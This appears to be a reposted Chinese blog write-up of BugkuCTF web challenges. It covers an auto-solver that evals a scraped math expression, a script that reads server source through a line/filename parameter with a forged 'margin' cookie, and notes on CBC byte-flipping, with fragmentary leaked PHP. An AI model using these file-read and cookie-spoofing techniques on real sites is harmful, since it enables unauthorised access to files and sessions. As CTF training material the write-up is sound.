bugkuctf wp2

秋名山老司机


下面的表达式的值是秋名山的车速


亲请在2s内计算老司机的车速是多少

1782911879+706686703-1996813020-984998196*1213520247-1805071043*379299795+1623596400-1052850963+2102818407-2101949215=?;

两秒之内计算出式子中的值, 再提交

菜鸡还不太会写脚本
参考了dalao们的代码

import requests
import re
url = 'http://120.24.86.145:8002/qiumingshan/'
s = requests.Session()
source = s.get(url)
expression = re.search(r'(\d+[+\-*])+(\d+)', source.text).group()
result = eval(expression)
post = {'value': result}
print(s.post(url, data = post).text)

不过还是没搞出来。


复习一下requests

import requests
#构造requests对象

s = requests.get(url)
s.post(url,   )

#差不多就这些了

cookies欺骗

bugkuctf wp2_第1张图片
题目

然而注意到URL中的line和file时就能做出来了。

#用脚本把代码跑出来
import requests
a=30
for i in range(a):
    url="http://120.24.86.145:8002/web11/index.php?line="+str(i)+"&filename=aW5kZXgucGhw" 
    s=requests.get(url)
    print s.text

'keys.txt',
'1' =>'index.php',
);
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){       //看这里
 $file_list[2]='keys.php';
 }
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
} 
?>

构造cookie就行啦
(然而没搞出flag来)

login4

CBC字节翻转攻击
放一张经典的图


bugkuctf wp2_第2张图片
CBC

据师傅们的wp说是有一个index.php.swp文件存在。
然而没找到, 先把师傅们找到的源码放上来

base64_decode('".base64_encode($plain)."') can't unserialize

"); $_SESSION['username'] = $info['username']; }else{ die("ERROR!"); } } } function show_homepage(){ if ($_SESSION["username"]==='admin'){ echo '

Hello admin

'; echo '

Flag is $flag

'; }else{ echo '

hello '.$_SESSION['username'].'

'; echo '

Only admin can see flag

'; } echo '

Log out

'; } if(isset($_POST['username']) && isset($_POST['password'])){ $username = (string)$_POST['username']; $password = (string)$_POST['password']; if($username === 'admin'){ exit('

admin are not allowed to login

'); }else{ $info = array('username'=>$username,'password'=>$password); login($info); show_homepage(); } }else{ if(isset($_SESSION["username"])){ check_login(); show_homepage(); }else{ echo '
'; } } ?>

参考资料

秋名山老司机
cookie欺骗
CBC字节翻转攻击

python requests库学习

你可能感兴趣的:(bugkuctf wp2)